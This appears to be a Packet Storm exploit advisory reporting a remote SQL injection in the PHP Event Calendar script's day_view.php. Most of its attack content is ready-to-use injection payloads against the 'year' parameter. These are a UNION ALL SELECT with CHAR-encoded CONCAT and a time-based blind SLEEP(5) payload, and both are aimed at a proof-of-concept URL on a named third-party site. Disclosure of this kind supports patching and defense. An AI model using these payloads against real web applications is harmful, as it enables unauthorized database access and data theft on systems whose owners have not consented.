PHP Event Calendar suffers from a remote SQL injection vulnerability in day_view.php.
f2e5f97ec1c421bce7a7e7d28f1d98f1baf6873f75e6a7451aeb4db0d150ce4e# Exploit Title: PHP Event Calendar / SQL Injection Vulnerability#
Date: 14/04/2014# Author: Daniel Godoy# Author Mail:
danielgodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: PHP Event Calendar# Software
Link: http://codecanyon.net/item/php-event-calendar/47723# Tested on:
Linux
[Comment]Greetz: Ariel Orellana www.remoteexecution.net
www.remoteexcution.com.ar [PoC] http://envato.jigowatt.co.uk/code/calendar/day_view.php?day=23&month=4&year=2014
Place: GETParameter: year Type: UNION query Title: MySQL
UNION query (NULL) - 1 to 10 columns Payload:
day=23&month=4&year=2014' UNION ALL SELECT NULL, NULL, NULL, NULL,
NULL, NULL,
CONCAT(CHAR(58,100,120,121,58),IFNULL(CAST(CHAR(113,68,117,66,112,104,104,66,114,109)
AS CHAR),CHAR(32)),CHAR(58,115,104,115,58)), NULL# AND 'JNPR'='JNPR
Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND
time-based blind Payload: day=23&month=4&year=2014' AND SLEEP(5)
AND 'PIGb'='PIGb
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed